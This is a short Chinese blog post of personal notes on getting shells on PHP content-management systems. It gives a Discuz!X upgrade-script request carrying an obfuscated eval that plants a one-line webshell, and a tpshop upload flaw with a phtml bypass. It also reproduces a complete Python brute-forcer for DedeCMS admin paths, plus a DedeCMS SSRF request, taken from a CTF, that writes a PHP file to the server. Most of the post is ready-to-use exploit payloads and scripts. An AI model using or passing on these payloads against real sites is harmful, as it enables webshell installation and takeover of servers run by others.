NEKO

cms-vul

2018/06/05

都是能百度到的,用到了就记一下.

Discuz!X升级getshell

poc:

1
2
3
url:http://www.xxx.net/utility/convert/index.php?a=config&source=d7.2_x2.0
post:
a=config&source=d7.2_x2.0&submit=yes&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5baaa%0d%0a%0d%0aeval(Chr(101%29.Chr%28118%29.Chr%2897%29.Chr%28108%29.Chr%2840%29.Chr%2834%29.Chr%2836%29.Chr%2895%29.Chr%2880%29.Chr%2879%29.Chr%2883%29.Chr%2884%29.Chr%2891%29.Chr%28116%29.Chr%28111%29.Chr%28109%29.Chr%2893%29.Chr%2859%29.Chr%2834%29.Chr%2841%29.Chr%2859%29%29%3b%2f%2f%5d=localhost&newconfig%5bsource%5d%5bdbuser%5d=root&newconfig%5bsource%5d%5bdbpw%5d=&newconfig%5bsource%5d%5bdbname%5d=discuz&newconfig%5bsource%5d%5btablepre%5d=cdb_&newconfig%5bsource%5d%5bdbcharset%5d=&newconfig%5bsource%5d%5bpconnect%5d=1&newconfig%5btarget%5d%5bdbhost%5d=localhost&newconfig%5btarget%5d%5bdbuser%5d=root&newconfig%5btarget%5d%5bdbpw%5d=&newconfig%5btarget%5d%5bdbname%5d=discuzx&newconfig%5btarget%5d%5btablepre%5d=pre_&newconfig%5btarget%5d%5bdbcharset%5d=&newconfig%5btarget%5d%5bpconnect%5d=1&submit=%b1%a3%b4%e6%b7%fe%ce%f1%c6%f7%c9%e8%d6%c3

可在

1
https://webshell.cc/utility/convert/data/config.inc.php

中写入一句话:eval("$_POST[tom];");

tpshop有条件的后台getshell

https://www.seebug.org/vuldb/ssvid-96925
最新版的tpshop,20180502.
之前的版本是无条件前台getshell,最新版的只能后台getshell,并且有利用条件.
/application/admin/controller/Uploadify.php189~215:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
if (preg_match("#^data:image/(\w+);base64,(.*)$#", $src, $matches)) {
$previewUrl = sprintf(
"%s://%s%s",
isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 'https' : 'http',
$_SERVER['HTTP_HOST'], $_SERVER['REQUEST_URI']
);
$previewUrl = str_replace("preview.php", "", $previewUrl);
$base64 = $matches[2];
$type = $matches[1];
if ($type === 'jpeg') {
$type = 'jpg';
}

$filename = md5($base64) . ".$type";
$filePath = $DIR . DIRECTORY_SEPARATOR . $filename;
if (file_exists($filePath)) {
die('{"jsonrpc" : "2.0", "result" : "' . $previewUrl . 'preview/' . $filename . '", "id" : "id"}');
} else {
$data = base64_decode($base64);
$filePathLower = strtolower($filePath);
if (strstr($filePathLower, '../') || strstr($filePathLower, '..\\') || strstr($filePathLower, '.php')) {
die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "文件上传格式错误 error !"}}');
}
file_put_contents($filePath, $data);
die('{"jsonrpc" : "2.0", "result" : "' . $previewUrl . 'preview/' . $filename . '", "id" : "id"}');
}

与之前的版本相比过滤了php,../,..\,但是如果服务器能够解析phtml的话,还是可以利用的.

tomcat 7.0.79 7.0.81

CVE-2017-12615
http://www.moonsec.com/post-789.html

dede后台名猜解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
# coding:utf-8
# Author:LSA
# Description:Brute dedecms background
# Date:20180303
# Version:v1.0



import itertools
import requests
import sys

timeout = 7


def bruteDedeBg(target):
f0 = 0
f1 = 0
bg = ''
chars = 'abcdefghijklmnopqrstuvwxyz0123456789_!+-='
data = {
"_FILES[lsa][tmp_name]": "./{0}</images/admin_top_logo.gif",
"_FILES[lsa][name]": 0,
"_FILES[lsa][size]": 0,
"_FILES[lsa][type]": "image/gif"
}

for t in itertools.permutations(chars, 2):
if f0:
break
t = ''.join(t)
data["_FILES[lsa][tmp_name]"] = data["_FILES[lsa][tmp_name]"].format(t)
print 'Bruting first two chars: ' + t
rsp = requests.post(url=target, data=data, timeout=timeout)
if "Upload filetype not allow !" not in rsp.text and rsp.status_code == 200:
f0 = 1
bg = t
data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"
print 'First two chars: ' + t
break
else:
data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"

if f0 == 0: # 爆破aa,dd,cc为前两个字符的情况
for tt in chars:
tt = tt + tt
if f0:
break
data["_FILES[lsa][tmp_name]"] = data["_FILES[lsa][tmp_name]"].format(tt)
print 'Bruting first two chars: ' + tt
rsp2 = requests.post(url=target, data=data, timeout=timeout)
if "Upload filetype not allow !" not in rsp2.text and rsp2.status_code == 200:
f0 = 1
bg = tt
data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"
print 'First two chars: ' + tt
break
else:
data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"

if f0 == 0:
print 'Can not brute the first two chars!'
sys.exit(0)

for dedebgNum in range(1, 254):
if f1:
break
for c in chars:

data["_FILES[lsa][tmp_name]"] = data["_FILES[lsa][tmp_name]"].format(bg + c)
rsp1 = requests.post(url=target, data=data, timeout=timeout)
if "Upload filetype not allow !" not in rsp1.text and rsp1.status_code == 200:
bg = bg + c
print 'Bruting background: ' + bg
data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"
break
else:
data["_FILES[lsa][tmp_name]"] = "./{0}</images/admin_top_logo.gif"
if c == '=':
f1 = 1
break

print '************************'
print 'Background is: ' + bg # 如果访问后不是后台,则可能是后台地址用了chars没有的字符或使用了防御方案
print '************************'


if __name__ == '__main__':
target = raw_input('Please input the target: ')
bruteDedeBg(target)

脚本来源:
https://paper.tuisec.win/detail/d1053143f127862
参考:
https://xz.aliyun.com/t/2064

dede ssrf

来自巅峰极客的一道题目
wp:https://xz.aliyun.com/t/2469#toc-3
题目描述:

1
2
3
4
5
6
7
8
运维自己的网站,我还是喜欢用shell的方式,这样肯定没人能日进来了。
1.php
<?php
if ($_SERVER['REMOTE_ADDR'] !== '127.0.0.1') {
die('Who are you? your ip is:'.$_SERVER['REMOTE_ADDR']);
}
$_GET['a']($_GET['b']);
?>

getimagesize这个函数还可以远程http请求,导致可以进行ssrf。

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /tags.php HTTP/1.1
Host: love.lemon
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7,ja;q=0.6
Cookie: YDAL_2132_saltkey=umJCWaoK; YDAL_2132_lastvisit=1531231707; YDAL_2132_ulastactivity=8d9ffh%2BiVUvLiWxFVmAltTKPHq5V9hUJ5PvDa4s84r553KMhDZMx; YDAL_2132_auth=a017j1pf9qMN%2F5Pa1g7C6kyv3ik6f%2B7eqtppI5c6sSWzI0ggQU5wSkRNDoXuXqvSSMnI%2BN3ObxEMn7jaaNJW; YDAL_2132_nofavfid=1; YDAL_2132_lip=10.211.55.2%2C1531237092; YDAL_2132_home_diymode=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 251

dopost=save&_FILES[lsa][tmp_name]=http://127.0.0.1/1.php?a=assert%26b=file_put_contents($_GET[1],base64_decode($_GET[2]));%261=./uploads/soft/aaaa.php%262=PD9waHAgcGhwaW5mbygpOyA/Pg==&_FILES[lsa][name]=0&_FILES[lsa][size]=0&_FILES[lsa][type]=image/gif

thinkphp缓存getshell

https://www.cnblogs.com/h2zZhou/p/7824723.html

原文作者: n3k0

发表日期: June 5th 2018, 11:22:41

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. Discuz!X升级getshell
  2. 2. tpshop有条件的后台getshell
  3. 3. tomcat 7.0.79 7.0.81
  4. 4. dede后台名猜解
  5. 5. dede ssrf
  6. 6. thinkphp缓存getshell